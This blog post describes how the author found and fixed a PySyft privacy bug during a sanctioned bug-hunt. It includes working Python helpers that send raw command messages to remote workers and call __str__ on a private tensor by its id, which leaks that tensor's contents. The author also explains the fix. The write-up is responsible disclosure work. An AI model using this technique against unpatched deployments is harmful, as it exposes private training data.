Hack PySyft - Find Bugs Before the Malicious Guys

Last edited: January 1, 1970

Starting from May 2019 I've been part of the Secure and Private AI Scholarship sponsored by Facebook, the course was taught by Andrew Trask and covered topics around privacy preserving deep learning, we also learned about PySyft and I had the chance to start contributing to this amazing project.

On July 31st, 2019, Trask launched the Hack PySyft initiative, saying 'Some day, when PySyft is deployed in production around the world, someone evil is going to try to hack PySyft and steal personal data. This Issue is where we try to do it first.' So the challenge was to hack PySyft (and fix it) before that attackers do. I got motivated and started bug hunting the next day. For the rest of this post I will walk you through my approach to finding a way to steal remote private data and how I fixed it. If you want to check the fix directly, then you can find it here.

The Context

Before talking about my approach, I should first give you an overview of the environment and what we are trying to achieve, so here is a figure explaining the architecture

I'm actually running these workers on the same machine, but the same scenario applies when they are distributed among different nodes. So here I'm controlling the evil worker and want to access private tensors on alice, bob and charlie workers that I know are holding 1 as value for their id.

My Approach

In a normal scenario where we do federated learning among a group of workers, we can use send() and recv() on tensors to move them around workers. When we send a tensor to a remote worker, we get a pointer referencing the transferred tensor on the remote machine, this pointer holds the id of the tensor and can be used to get it back or make remote operations on it (e.g addition). So the first thing that got into my mind was to construct a valid pointer referencing a private remote tensor since I know its id, this method worked just fine and I was able to get those private tensors, I even started posting on slack about it! Unfortunately, I was running an old version and Trask had already fixed that at that moment and private tensors weren't accessible anymore (another bad news is that slack doesn't have a feature to delete personal messages :/). You can see that fix below on line 5 or check the full code on Github here

def get_obj(self, obj_id: Union[str, int]) -> object:
        obj = super().get_obj(obj_id)
        if hasattr(obj, "child") and hasattr(obj.child, "set_garbage_collect_data"):
            obj.child.set_garbage_collect_data(value=False)
        if hasattr(obj, "private") and obj.private:
            return None
        return obj

So I started using the last version and changed my strategy, knowing that cloning the tensor will not keep the private attribute, I started trying to clone it, however calling clone() on my constructed pointer was always aborting the connection between my worker and the remote one due to an error that I wasn't able to explain since it works just fine with a tensor I sent myself, if anyone is interested then this path might also be interesting.

Here I knew that I have to try harder and started exploring the code to find a way to delete that private attribute and found this interesting method about executing commands on tensors and it wasn't making restrictions on private ones, you can see here that it's just accessing the object using its id, however, to trigger this function on a remote worker we had to send a message of type MSGTYPE.CMD with the id of the remote object as well as the name and arguments of the method to call, this limited me to the set of methods a tensor has. Here are the functions I used to construct those messages and send them to the remote workers

from syft import codes
import binascii

def command_msg(cname, oid, args: list, kwargs: dict) -> tuple:
    mtype = codes.MSGTYPE.CMD
    msg = (mtype, ((cname, oid, args, kwargs), []))
    return msg

def send_command(ws_client, message):
    serialized_message = sy.serde.serialize(message)
    ws_client.ws.send(str(binascii.hexlify(serialized_message)))
    response = ws_client.ws.recv()
    response = binascii.unhexlify(response[2:-1])
    return sy.serde.deserialize(response)

msg = command_msg('__str__', 1, [], {})

I wasn't sure about the response I get from the worker so I proceeded by experimentation, first I tried calling clone() and copy() but resulted in an error response, I directly thought about __str__() and was trying it hopelessly late at night, and I started seeing the waited private tensor.

To wrap it up, I was able to steal private tensors by sending command messages to remote workers telling them to run the __str__ method on a tensor that I had prior knowledge of its id, the remote worker was then responding with the string representation of the tensor. You can find the issue where I describe the bug here.

Fortunately, the problem is now fixed and we will just talk about that.

The Fix

The problem was that local private tensors shouldn't be used by remote ones, even if they know their ids, and the execute_command() should follow the same policy as get_obj() did: don't use tensors with private attribute when referenced from a remote worker. You can find the fix here.

Basically, instead of accessing the object with its id directly, we are now using get_obj() which is already secured and won't return a private tensor.

Conclusion

Exploring PySyft's code to find security bugs was a good way to learn about the project's heart like the kind of messages that are sent between workers and how a tensor is being manipulated remotely. I hope you enjoyed this post and of course if you are a White Hat and can contribute to PySyft by finding and fixing security bugs then give it a shot ;)